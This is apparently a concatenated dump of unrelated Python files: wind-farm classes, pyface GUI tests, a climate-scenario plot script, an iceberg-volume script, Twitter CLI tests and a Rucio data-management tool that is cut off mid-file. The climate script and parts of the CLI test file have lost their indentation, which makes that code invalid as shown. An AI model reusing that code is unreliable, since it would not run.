        self.hubHeight = hubHeigt
        self.x_horizontal = x_horizontal
        self.y_vertical = y_vertical
        # Rotor swept area; NaN when the diameter was not given.
        self.area = 0.25 * np.pi * self.diameter ** 2

    @property
    def info(self):
        """Return a two-column Property/Value DataFrame describing the turbine
        (unique name, diameter, swept area)."""
        rows = {
            "Property": ["Unique Name", "Diameter", "Area"],
            "Value": [self.uID, self.diameter, self.area],
        }
        return pd.DataFrame(rows)
class MRT(SRT):
    # Multi-rotor turbine. Currently identical to SRT; kept as a separate
    # subclass so multi-rotor-specific behaviour can be added later without
    # changing callers.
    pass
if __name__=='__main__': ##This section is made for tests. A more comprehensive test strategy will be developed later. Here the test can only check for syntax error, but to ensure script gives true resutls test mechanism should be developed.
    # Smoke test: build two farms, add SRT/MRT turbines and an environment,
    # then print the derived tables. Happy path only; relies on the
    # globals() injection done by addTurbine()/addEnvironment().
    Curslack = windFarm("Curslack_farm")
    WT1 = Curslack.addTurbine("C_WT1", hubHeigt=120, diameter=120, x_horizontal=480331, y_vertical=4925387)
    WT2 = Curslack.addTurbine("C_WT2", x_horizontal=480592, y_vertical=4925253)
    WT3 = Curslack.addTurbine("C_WT3", x_horizontal=480886, y_vertical=4925166)
    WT4 = Curslack.addTurbine("C_MWT4", turbineType="MRT", x_horizontal=480573, y_vertical=4925712)
    WT5 = Curslack.addTurbine("C_MWT5", turbineType="MRT", x_horizontal=480843, diameter=450, y_vertical=4925592)
    DanTysk=windFarm("Dantysk_name")
    Env = environment("C_Env")
    # Creates an environment without assigning it to any wind farm.
    print(Env.makeSectors())
    TheEnv_Dantysk = DanTysk.addEnvironment("D_env")
    TheEnv_Dantysk.Airdensity = 1.225
    # D_env exists at module level because addEnvironment() injected it.
    print(TheEnv_Dantysk.Airdensity == D_env.Airdensity)
    WT1 = DanTysk.addTurbine("D_WT1")
    WT2 = DanTysk.addTurbine("D_WT2", diameter=120)
    WT3 = DanTysk.addTurbine("D_WT3", x_horizontal=580592, y_vertical=5925253)
    WT3.diameter = 150 # Assigning WT3 diameter after creation.
    # D_WT1 exists at module level because addTurbine() injected it.
    print(WT1 == D_WT1)
    print(DanTysk.assets)
    print(Curslack.coordinates())
    print(Curslack.distances())
    print(DanTysk.info)
|
<gh_stars>1-10
from __future__ import absolute_import
import platform
import unittest
from ..constant import CANCEL, NO, OK, YES
from ..toolkit import toolkit_object
from ..window import Window
# Toolkit detection: these module-level flags drive the skip decorators below.
is_qt = toolkit_object.toolkit == 'qt4'
if is_qt:
    from pyface.qt import qt_api
# Resolve optional test helpers; the toolkit returns a class named
# 'Unimplemented' when a helper is unavailable on this backend.
GuiTestAssistant = toolkit_object('util.gui_test_assistant:GuiTestAssistant')
no_gui_test_assistant = (GuiTestAssistant.__name__ == 'Unimplemented')
ModalDialogTester = toolkit_object(
    'util.modal_dialog_tester:ModalDialogTester'
)
no_modal_dialog_tester = (ModalDialogTester.__name__ == 'Unimplemented')
is_pyqt5 = (is_qt and qt_api == 'pyqt5')
is_pyqt4_linux = (is_qt and qt_api == 'pyqt' and platform.system() == 'Linux')
@unittest.skipIf(no_gui_test_assistant, 'No GuiTestAssistant')
class TestWindow(unittest.TestCase, GuiTestAssistant):
    """Toolkit-level tests for pyface Window: lifecycle, geometry, visibility
    events and the confirm/information/warning/error dialog helpers."""
    def setUp(self):
        GuiTestAssistant.setUp(self)
        self.window = Window()
    def tearDown(self):
        # Destroy the widget (if one was created) inside the event loop
        # before dropping the Python reference.
        if self.window.control is not None:
            with self.delete_widget(self.window.control):
                self.window.destroy()
        self.window = None
        GuiTestAssistant.tearDown(self)
    def test_destroy(self):
        # test that destroy works even when no control
        with self.event_loop():
            self.window.destroy()
    def test_open_close(self):
        # test that opening and closing works as expected
        with self.assertTraitChanges(self.window, 'opening', count=1):
            with self.assertTraitChanges(self.window, 'opened', count=1):
                with self.event_loop():
                    self.window.open()
        with self.assertTraitChanges(self.window, 'closing', count=1):
            with self.assertTraitChanges(self.window, 'closed', count=1):
                with self.event_loop():
                    self.window.close()
    def test_show(self):
        # test that showing works as expected
        with self.event_loop():
            self.window._create()
        with self.event_loop():
            self.window.show(True)
        with self.event_loop():
            self.window.show(False)
        with self.event_loop():
            self.window.destroy()
    def test_activate(self):
        # test that activation works as expected
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.activate()
        with self.event_loop():
            self.window.close()
    def test_position(self):
        # test that default position works as expected
        self.window.position = (100, 100)
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.close()
    def test_reposition(self):
        # test that changing position works as expected
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.position = (100, 100)
        with self.event_loop():
            self.window.close()
    def test_size(self):
        # test that default size works as expected
        self.window.size = (100, 100)
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.close()
    def test_resize(self):
        # test that changing size works as expected
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.size = (100, 100)
        with self.event_loop():
            self.window.close()
    def test_title(self):
        # test that default title works as expected
        self.window.title = "Test Title"
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.close()
    def test_retitle(self):
        # test that changing title works as expected
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.title = "Test Title"
        with self.event_loop():
            self.window.close()
    def test_show_event(self):
        # test that a toolkit-level show is reflected in the 'visible' trait
        with self.event_loop():
            self.window.open()
        with self.event_loop():
            self.window.visible = False
        with self.assertTraitChanges(self.window, 'visible', count=1):
            with self.event_loop():
                self.window.control.show()
        self.assertTrue(self.window.visible)
    def test_hide_event(self):
        # test that a toolkit-level hide is reflected in the 'visible' trait
        with self.event_loop():
            self.window.open()
        with self.assertTraitChanges(self.window, 'visible', count=1):
            with self.event_loop():
                self.window.control.hide()
        self.assertFalse(self.window.visible)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Confirmation dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_confirm_reject(self):
        # test that cancel works as expected
        tester = ModalDialogTester(
            lambda: self.window.confirm("message", cancel=True)
        )
        tester.open_and_run(when_opened=lambda x: x.close(accept=False))
        self.assertEqual(tester.result, CANCEL)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Confirmation dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_confirm_yes(self):
        # test that yes works as expected
        tester = ModalDialogTester(lambda: self.window.confirm("message"))
        tester.open_and_wait(when_opened=lambda x: x.click_button(YES))
        self.assertEqual(tester.result, YES)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Confirmation dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_confirm_no(self):
        # test that no works as expected
        tester = ModalDialogTester(lambda: self.window.confirm("message"))
        tester.open_and_wait(when_opened=lambda x: x.click_button(NO))
        self.assertEqual(tester.result, NO)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Confirmation dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Confirmation dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_confirm_cancel(self):
        # test that cancel works as expected
        tester = ModalDialogTester(
            lambda: self.window.confirm("message", cancel=True)
        )
        tester.open_and_wait(when_opened=lambda x: x.click_button(CANCEL))
        self.assertEqual(tester.result, CANCEL)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    def test_information_accept(self):
        self._check_message_dialog_accept(self.window.information)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Message dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Message dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_information_ok(self):
        self._check_message_dialog_ok(self.window.information)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    def test_warning_accept(self):
        self._check_message_dialog_accept(self.window.warning)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Message dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Message dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_warning_ok(self):
        self._check_message_dialog_ok(self.window.warning)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    def test_error_accept(self):
        self._check_message_dialog_accept(self.window.error)
    @unittest.skipIf(no_modal_dialog_tester, 'ModalDialogTester unavailable')
    @unittest.skipIf(
        is_pyqt5, "Message dialog click tests don't work on pyqt5."
    )
    @unittest.skipIf(
        is_pyqt4_linux,
        "Message dialog click tests don't work reliably on linux.  Issue #282."
    )
    def test_error_ok(self):
        self._check_message_dialog_ok(self.window.error)
    def _check_message_dialog_ok(self, method):
        # open the dialog, click OK; a message dialog returns no result
        tester = self._setup_tester(method)
        tester.open_and_wait(when_opened=lambda x: x.click_button(OK))
        self.assertIsNone(tester.result)
    def _check_message_dialog_accept(self, method):
        # open the dialog, accept-close it; a message dialog returns no result
        tester = self._setup_tester(method)
        tester.open_and_run(when_opened=lambda x: x.close(accept=True))
        self.assertIsNone(tester.result)
    def _setup_tester(self, method):
        # build a ModalDialogTester around *method* with fixed dialog kwargs
        kwargs = {
            'title': 'Title',
            'detail': 'Detail',
            'informative': 'Informative'
        }
        tester = ModalDialogTester(lambda: method("message", **kwargs))
        return tester
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 13 09:38:08 2021
@author: thedi
"""
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from climlib import *
#Do you want to plot the vanilla results, or the ones showing the vippepunkt?
#name = 'predicts.npy'
# Scenario years in which emissions are assumed to reverse.
year_list = [2036, 2043, 2044, 2050]
cmap = matplotlib.cm.get_cmap('Accent')
alpha = 1
fig, axs = plt.subplots(nrows=1, ncols=3, figsize=(15, 7))
plt.suptitle('Hva skjer hvis man bestemmer seg for å reversere utslippene i 2036, 2043, 2044 eller 2050?')
# Bug fix: ndarray.flatten() returns a copy, so the bare call was a no-op.
# Bind the flattened array so axs[i] indexing works for any subplot grid shape.
axs = axs.flatten()
for i, year_thresh in enumerate(reversed(year_list)):
#load prediction models
name = 'predicts_vippepunkt_%s.npy'%year_thresh
predictions = np.load(name, allow_pickle = True)
#plot icelats and co2e levels
predmodel = predictions[3]
if year_thresh == 2044:
#plot icelats and co2e levels
axs[0].plot(predmodel.years, predmodel.co2e_array, color = cmap(i/len(year_list)), linestyle = '--', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[1].plot(predmodel.co2e_array, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '--', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[2].plot(predmodel.years, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '--', label = 'Revers i %s'%year_thresh, alpha = alpha)
#plot decorations
axs[1].annotate(text = 'isfritt', xy=(predmodel.co2e_array[2060-2021], predmodel.icelat[2060-2021]), xytext=(predmodel.co2e_array[2060-2021], predmodel.icelat[2060-2021]-0.7))
axs[2].annotate(text = 'isfritt', xy=(predmodel.years[2060-2021], predmodel.icelat[2060-2021]), xytext=(predmodel.years[2060-2021]-5, predmodel.icelat[2060-2021]-0.7))
else:
#plot icelats and co2e levels
axs[0].plot(predmodel.years, predmodel.co2e_array, color = cmap(i/len(year_list)), linestyle = '-', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[1].plot(predmodel.co2e_array, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '-', label = 'Revers i %s'%year_thresh, alpha = alpha)
axs[2].plot(predmodel.years, predmodel.icelat, color = cmap(i/len(year_list)), linestyle = '-', label = 'Revers i %s'%year_thresh, alpha = alpha)
#plot decorations
max_co2_i = np.argmax(predmodel.co2e_array)
axs[0].plot(predmodel.years[max_co2_i], predmodel.co2e_array[max_co2_i], 'ko')
axs[0].annotate(text = int(year_thresh), xy=(predmodel.years[max_co2_i], predmodel.co2e_array[max_co2_i]), xytext=(predmodel.years[max_co2_i]+4, predmodel.co2e_array[max_co2_i]-3))
axs[0].scatter(predmodel.years[-1], predmodel.co2e_array[-1], color = cmap(i/len(year_list)), linestyle = 'dotted')
axs[1].scatter(predmodel.co2e_array[-1], predmodel.icelat[-1], color = cmap(i/len(year_list)), linestyle = 'dotted')
axs[2].scatter(predmodel.years[-1], predmodel.icelat[-1], color = cmap(i/len(year_list)), linestyle = 'dotted')
#plot decorations
axs[0].plot(predmodel.years[0], predmodel.co2e_array[0], 'ko')
axs[1].plot(predmodel.co2e_array[0], predmodel.icelat[0], 'ko')
axs[2].plot(predmodel.years[0], predmodel.icelat[0], 'ko')
axs[0].annotate(text = 'Dagens nivå', xy=(predmodel.years[0], predmodel.co2e_array[0]), xytext=(predmodel.years[0]-1, predmodel.co2e_array[0]-7))
axs[1].annotate(text = 'Dagens nivå', xy=(predmodel.co2e_array[0], predmodel.icelat[0]), xytext=(predmodel.co2e_array[0]+7, predmodel.icelat[0]-0.2))
axs[2].annotate(text = 'Dagens nivå', xy=(predmodel.years[0], predmodel.icelat[0]), xytext=(predmodel.years[0]+4, predmodel.icelat[0]-0.2))
axs[0].set_xlim(2015,2165)
axs[2].set_xlim(2015,2165)
axs[1].set_ylim(70,91)
axs[0].set_xlabel('År')
axs[0].set_ylabel('CO2e-nivåer [ppm]')
axs[1].set_xlabel('CO2e-nivåer [ppm]')
axs[1].set_ylabel('Iskant [breddegrad]')
axs[2].set_xlabel('År')
axs[2].set_ylabel('Iskant [breddegrad]')
axs[0].legend()
axs[1].legend()
axs[2].legend()
axs[0].grid()
axs[1].grid()
axs[2].grid()
fig.tight_layout()
fig.show() |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Application to find icebergs and their towing ability
Author: <NAME>
Created on Wed Jan 9 00:01:25 2019
"""
"""Modules imported for the application"""
import csv  # to read radar and lidar data
import matplotlib.pyplot as plt  # to display radar and lidar data
import numpy as np  # to convert list to array


def read_grid(filename):
    """Read a CSV file of numeric pixel values into a 2D list of floats.

    Both the radar and the lidar text files (saved from an html source)
    share this format, so one reader serves both.
    """
    grid = []
    with open(filename) as source:
        reader = csv.reader(source, quoting=csv.QUOTE_NONNUMERIC)  # floats
        for row in reader:
            grid.append(list(row))
    return grid


def is_berg(value):
    """Return True when a pixel value is classified as iceberg (100..256)."""
    return 100 <= value <= 256


# Extract radar data as a 2D list representing the sea as pixel values.
sea = read_grid('white1.radar.txt')

# Find the iceberg: record its starting and ending row/column indexes.
# A value of 100 or above is assigned to be iceberg. To prevent edge effects
# the indexes start from 1 and stop one value before the length of the area.
# BUGFIX: the original kept five tracking lists, one of which
# (icebergEndCol) was defined twice -- the duplicate was clearly meant to be
# icebergEndRow -- and none of which was ever used; they are removed here.
# NOTE(review): only a single (rectangular) iceberg is supported; if several
# are present, the last edges scanned win -- TODO confirm input data.
for rowindex in range(1, len(sea) - 1):
    rowabove = sea[rowindex - 1]  # row above the current cell
    row = sea[rowindex]
    rowbelow = sea[rowindex + 1]  # row below the current cell
    for colindex in range(1, len(row) - 1):
        if is_berg(row[colindex]):
            # A bounding-box edge is a berg cell with open water next to it.
            if not is_berg(row[colindex + 1]):
                icebergendcolindex = colindex
            if not is_berg(row[colindex - 1]):
                icebergstartcolindex = colindex
            if not is_berg(rowabove[colindex]):
                icebergstartrowindex = rowindex
            if not is_berg(rowbelow[colindex]):
                icebergendrowindex = rowindex

# Print the bounding box of the iceberg.
print("icebergstartrowindex ", icebergstartrowindex)
print("icebergstartcolindex", icebergstartcolindex)
print("icebergendrowindex", icebergendrowindex)
print("icebergendcolindex", icebergendcolindex)

# Extract lidar data (heights) with the same reader.
lidar_sea = read_grid('white1.lidar.txt')

# Display the radar and lidar data as images, with the iceberg marked.
plt.subplot(1, 2, 1)  # 1x2 subplot: radar on the left
plt.ylim(0, 300)  # set the y axis in plot
plt.xlim(0, 300)  # set the x axis in plot
plt.text(200, 220, 'Sea', fontsize=12)
# Annotate the iceberg with an arrow.
plt.annotate("Iceberg", xy=(155, 145), xytext=(180, 100), arrowprops=dict(facecolor="red"))
plt.title('Radar image of a sea with iceberg', fontsize=12, fontname='Times New Roman')
plt.imshow(sea, 'Blues_r')  # display the sea in blue and white

plt.subplot(1, 2, 2)  # lidar on the right
plt.ylim(0, 300)
plt.xlim(0, 300)
plt.text(200, 220, 'Sea', fontsize=12)
plt.annotate("Iceberg", xy=(155, 145), xytext=(180, 100), arrowprops=dict(facecolor="red"))
plt.title('Lidar image of a sea with iceberg', fontsize=12, fontname='Times New Roman')
plt.imshow(lidar_sea, 'Blues_r')
plt.tight_layout()
plt.show()

# Pull the iceberg heights out of the lidar data using the radar bounding box.
np_lidar_sea = np.array(lidar_sea, dtype=int)
iceberg = np_lidar_sea[icebergstartrowindex:icebergendrowindex + 1,
                       icebergstartcolindex:icebergendcolindex + 1]

# Volume: one lidar unit represents 0.1 m of height and each pixel covers
# an area of 1 m^2, so volume per pixel = value * 0.1 * 1.
total_iceberg_vol = 0.0
for pixel_row in iceberg:
    for height_units in pixel_row:
        total_iceberg_vol += height_units * 0.1 * 1
print("Total iceberg volume:", total_iceberg_vol, "m3")

# Mass above sea level: mass = density * volume, iceberg density 900 kg/m3.
iceberg_mass = total_iceberg_vol * 900
# Assuming only 10% of the ice is above sea level, scale up to total mass.
total_iceberg_mass = iceberg_mass * 10
print("Total iceberg mass:", total_iceberg_mass, "kg")

# The iceberg can be dragged out in time only if below 36 million kg.
if total_iceberg_mass >= 36000000:
    print("Dragging iceberg is not possible")
else:
    print("Dragging iceberg is possible")
|
#
# Copyright 2019-2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
from datetime import date
from logging import getLogger
from pathlib import Path
from typing import List, Mapping, Optional, Sequence, Type
import pytest
from _pytest.capture import CaptureFixture
from _pytest.monkeypatch import MonkeyPatch
from typing_extensions import Final
from nasty import main
from nasty.batch.batch import Batch
from nasty.request.replies import Replies
from nasty.request.request import DEFAULT_BATCH_SIZE, DEFAULT_MAX_TWEETS, Request
from nasty.request.search import DEFAULT_FILTER, DEFAULT_LANG, Search, SearchFilter
from nasty.request.thread import Thread
from .mock_context import MockRequestContext
logger = getLogger(__name__)
REQUESTS: Final[Mapping[Type[Request], Sequence[Request]]] = {
Search: [
Search("trump"),
Search("<NAME>"),
Search("trump", since=date(2019, 3, 21), until=date(2019, 3, 22)),
Search("trump", filter_=SearchFilter.LATEST),
Search("trump", lang="de"),
Search("trump", max_tweets=17, batch_size=71),
Search("trump", max_tweets=None, batch_size=DEFAULT_BATCH_SIZE),
],
Replies: [
Replies("332308211321425920"),
Replies("332308211321425920", max_tweets=17, batch_size=71),
Replies("332308211321425920", max_tweets=None, batch_size=DEFAULT_BATCH_SIZE),
],
Thread: [
Thread("332308211321425920"),
Thread("332308211321425920", max_tweets=17, batch_size=71),
Thread("332308211321425920", max_tweets=None, batch_size=DEFAULT_BATCH_SIZE),
],
}
ALL_REQUESTS: Final[Sequence[Request]] = [
request for requests_for_type in REQUESTS.values() for request in requests_for_type
]
def _make_args(  # noqa: C901
    request: Request,
    to_batch: Optional[Path] = None,
    daily: bool = False,
) -> Sequence[str]:
    """Translate *request* into the equivalent nasty CLI argument list."""
    cli_args: List[str] = []

    # Sub-command and request-type specific options.
    if isinstance(request, Search):
        cli_args.extend(["search", "--query", request.query])
        if request.since:
            cli_args.extend(["--since", request.since.strftime("%Y-%m-%d")])
        if request.until:
            cli_args.extend(["--until", request.until.strftime("%Y-%m-%d")])
        if request.filter != DEFAULT_FILTER:
            cli_args.extend(["--filter", request.filter.name])
        if request.lang != DEFAULT_LANG:
            cli_args.extend(["--lang", request.lang])
    elif isinstance(request, Replies):
        cli_args.extend(["replies", "--tweet-id", request.tweet_id])
    elif isinstance(request, Thread):
        cli_args.extend(["thread", "--tweet-id", request.tweet_id])
    else:
        raise ValueError("Unimplemented Request subclass: {}.".format(type(request)))

    # Options shared by every request type. -1 means "unlimited" on the CLI.
    if request.max_tweets is None:
        cli_args.extend(["--max-tweets", "-1"])
    elif request.max_tweets != DEFAULT_MAX_TWEETS:
        cli_args.extend(["--max-tweets", str(request.max_tweets)])
    if request.batch_size != DEFAULT_BATCH_SIZE:
        cli_args.extend(["--batch-size", str(request.batch_size)])
    if to_batch is not None:
        cli_args.extend(["--to-batch", str(to_batch)])
    if daily:
        if not isinstance(request, Search):
            raise ValueError("daily can only be used for Search-requests.")
        cli_args.append("--daily")

    return cli_args
@pytest.mark.parametrize("request_", ALL_REQUESTS, ids=repr)
def test_correct_call(
request_: Request, monkeypatch: MonkeyPatch, capsys: CaptureFixture
) -> None:
mock_context: MockRequestContext = MockRequestContext()
monkeypatch.setattr(
type(request_), request_.request.__name__, mock_context.mock_request
)
main(*_make_args(request_))
assert mock_context.request == request_
assert not mock_context.remaining_result_tweets
assert capsys.readouterr().out == ""
@pytest.mark.parametrize("num_results", [5, 10, 20], ids=repr)
@pytest.mark.parametrize(
"request_",
[
Search("trump", max_tweets=10),
Replies("332308211321425920", max_tweets=10),
Thread("332308211321425920", max_tweets=10),
],
ids=repr,
)
def test_correct_call_results(
request_: Request,
num_results: int,
monkeypatch: MonkeyPatch,
capsys: CaptureFixture,
) -> None:
mock_context: MockRequestContext = MockRequestContext(num_results=num_results)
monkeypatch.setattr(
type(request_), request_.request.__name__, mock_context.mock_request
)
main(*_make_args(request_))
assert mock_context.request == request_
assert not mock_context.remaining_result_tweets
assert capsys.readouterr().out == (
json.dumps(mock_context.RESULT_TWEET.to_json()) + "\n"
) * min(10, num_results)
@pytest.mark.parametrize("request_", ALL_REQUESTS, ids=repr)
def test_correct_call_to_batch(
request_: Request,
capsys: CaptureFixture,
tmp_path: Path,
) -> None:
batch_file = tmp_path / "batch.jsonl"
main(*_make_args(request_, to_batch=batch_file))
assert capsys.readouterr().out == ""
batch = Batch()
batch.load(batch_file)
assert len(batch) == 1
assert batch[0].request == request_
assert batch[0].id
assert batch[0].completed_at is None
assert batch[0].exception is None
@pytest.mark.parametrize(
    "old_request,new_request",
    [
        (REQUESTS[Search][0], REQUESTS[Search][1]),
        (REQUESTS[Replies][0], REQUESTS[Replies][1]),
        (REQUESTS[Thread][0], REQUESTS[Thread][1]),
    ],
    ids=repr,
)
def test_correct_call_to_batch_exists(
    old_request: Request,
    new_request: Request,
    capsys: CaptureFixture,
    tmp_path: Path,
) -> None:
    """--to-batch appends to an existing batch file without clobbering it."""
    batch_file = tmp_path / "batch.jsonl"
    # Pre-populate the batch file with one entry.
    batch = Batch()
    batch.append(old_request)
    batch.dump(batch_file)
    main(*_make_args(new_request, to_batch=batch_file))
    assert capsys.readouterr().out == ""
    # Reload from disk: both the old and the new entry must be present, in order.
    batch = Batch()
    batch.load(batch_file)
    assert len(batch) == 2
    for batch_entry, expected_request in zip(batch, [old_request, new_request]):
        assert batch_entry.request == expected_request
        assert batch_entry.id
        assert batch_entry.completed_at is None
        assert batch_entry.exception is None
def test_correct_call_to_batch_daily(capsys: CaptureFixture, tmp_path: Path) -> None:
    """--daily splits a date-ranged search into one batch entry per day."""
    batch_file = tmp_path / "batch.jsonl"
    request = Search("trump", since=date(2019, 1, 1), until=date(2019, 2, 1))
    # Needed for type checking.
    assert request.until is not None and request.since is not None
    main(*_make_args(request, to_batch=batch_file, daily=True))
    assert capsys.readouterr().out == ""
    batch = Batch()
    batch.load(batch_file)
    # One entry per day in [since, until).
    assert len(batch) == (request.until - request.since).days
    for batch_entry, expected_request in zip(batch, request.to_daily_requests()):
        assert batch_entry.request == expected_request
        assert batch_entry.id
        assert batch_entry.completed_at is None
        assert batch_entry.exception is None
|
<filename>admix/fix.py
import os
import time
import shutil
from argparse import ArgumentParser
import admix.helper.helper as helper
from admix import DEFAULT_CONFIG, __version__
from admix.interfaces.rucio_summoner import RucioSummoner
from admix.interfaces.database import ConnectMongoDB
from admix.utils.naming import make_did
from admix.utils.list_file_replicas import list_file_replicas
from utilix.config import Config
import utilix
from bson.json_util import dumps
from datetime import timezone, datetime, timedelta
import pymongo
class Fix():
    """Manual fix-up operations on runs: reset failed uploads, add/delete
    Rucio replication rules and patch the matching rundoc entries in the
    runDB.

    Attributes set externally by main(): ``skip_rucio`` (bool) and
    ``priority`` (int, Rucio rule priority).
    """

    def __init__(self):
        # Take all data type categories from the host configuration.
        self.NORECORDS_DTYPES = helper.get_hostconfig()['norecords_types']
        self.RAW_RECORDS_DTYPES = helper.get_hostconfig()['raw_records_types']
        self.RECORDS_DTYPES = helper.get_hostconfig()['records_types']
        # Choose which data types this tool can treat.
        self.DTYPES = self.NORECORDS_DTYPES + self.RECORDS_DTYPES + self.RAW_RECORDS_DTYPES
        # The list of all XENON RSEs.
        self.RSES = helper.get_hostconfig()['rses']
        # The RSE that is used to perform the upload.
        self.UPLOAD_TO = helper.get_hostconfig()['upload_to']
        # Init the runDB connection.
        self.db = ConnectMongoDB()
        # Init Rucio for later uploads and handling.
        self.rc = RucioSummoner()
        # Rucio rule assignment priority (overridden by the --priority flag).
        self.priority = 3

    # ------------------------------------------------------------------
    # Internal helpers (factored out of the previously duplicated code).
    # ------------------------------------------------------------------

    def _parse_did(self, did):
        """Split a DID like 'xnt_007155:dtype-hash' into (number, dtype, hash)."""
        did_hash = did.split('-')[-1]  # avoid shadowing the builtin `hash`
        dtype = did.split('-')[0].split(':')[-1]
        number = int(did.split(':')[0].split('_')[-1])
        return number, dtype, did_hash

    def _print_did_info(self, number, dtype, did_hash):
        """Print the standard run/dtype/hash header used by every command."""
        print("Run number: {0}".format(number))
        print("Data type: {0}".format(dtype))
        print("Hash: {0}".format(did_hash))

    def _print_run_status(self, run, label='Run status'):
        """Print the run's status field, or 'Not available' if absent."""
        if 'status' in run:
            print('{0}: {1}'.format(label, run['status']))
        else:
            print('{0}: {1}'.format(label, 'Not available'))

    def _get_eb_host(self, run):
        """Return the short hostname of the Event Builder that processed
        *run* (taken from the bootstrax entry), or None if not processed."""
        if 'bootstrax' in run:
            return run['bootstrax']['host'].split('.')[0]
        return None

    def _get_eb_datum(self, run, dtype, eb):
        """Return (datum, status) of the EB datum matching *dtype* on *eb*.

        Returns (None, "") when no datum matches; if several match, the last
        one wins (same behavior as the original inline loops).
        """
        ebstatus = ""
        datum = None
        for d in run['data']:
            if d['type'] == dtype and eb in d['host']:
                datum = d
                if 'status' in d:
                    ebstatus = d['status']
        return datum, ebstatus

    # ------------------------------------------------------------------
    # Public commands.
    # ------------------------------------------------------------------

    def reset_upload(self, did):
        """Undo an upload: delete the files on the upload RSE, drop all
        Rucio rules and set the EB datum back to 'eb_ready_to_upload'."""
        number, dtype, did_hash = self._parse_did(did)
        print("Resetting the upload associated to the DID: {0}".format(did))
        self._print_did_info(number, dtype, did_hash)

        run = self.db.db.find_one({'number': number})
        self._print_run_status(run)

        # Extract the Event Builder machine which processed this run.
        eb = self._get_eb_host(run)
        if eb is None:
            print('Not processed')
            return 0

        # Get the EB datum and its status.
        datum, ebstatus = self._get_eb_datum(run, dtype, eb)
        if datum is None:
            print('There is no EB datum. No reset is possible')
            return 0
        if ebstatus != "":
            print('EB status: {0}'.format(ebstatus))
        else:
            print('EB status: not available')

        # Step zero (normally not needed): change the run status to "transferring"
        # self.db.db.find_one_and_update({'number':number},{'$set':{"status": "transferring"}})

        # First action: remove the files stored in datamanager.
        files = list_file_replicas(number, dtype, did_hash, self.UPLOAD_TO)
        print("Deleting rucio data in datamanager disk. Deleting", len(files), "files")
        for file in files:
            try:
                os.remove(file)
            except OSError:
                # BUGFIX: was a bare `except:`; os.remove only raises
                # OSError subclasses (e.g. FileNotFoundError).
                print("File: {0} not found".format(file))

        # Second action: remove the Rucio rules from every RSE.
        deleted_any_rule = False
        for rse in self.RSES:
            rucio_rule = self.rc.GetRule(upload_structure=did, rse=rse)
            if rucio_rule['exists']:
                print("Deleting rucio rule = ", rucio_rule['id'], "from RSE = ", rse)
                self.rc.DeleteRule(rucio_rule['id'])
                deleted_any_rule = True
        # If some rule has been deleted, wait for 1 hour (plus 5 minutes of
        # margin) so Rucio fully processes the deletion.
        if deleted_any_rule:
            delay = 3600 + 60 * 5
            print("We have to wait for {0} seconds before proceeding to the next step".format(delay))
            time.sleep(delay)
        else:
            print("There is no rule to delete")

        # Third action: set the EB status as 'eb_ready_to_upload'.
        self.db.db.find_one_and_update(
            {'_id': run['_id'], 'data': {'$elemMatch': datum}},
            {'$set': {'data.$.status': 'eb_ready_to_upload'}})
        print("EB status changed to eb_ready_to_upload")

        # Reload the run and show the outcome.
        # BUGFIX: the unavailable-branch used to print 'Ru status'.
        run = self.db.db.find_one({'number': number})
        self._print_run_status(run, label='New run status')
        datum, ebstatus = self._get_eb_datum(run, dtype, eb)
        if ebstatus != "":
            print('New EB status: {0}'.format(ebstatus))
        else:
            print('New EB status: not available')

    def add_rule(self, did, from_rse, to_rse):
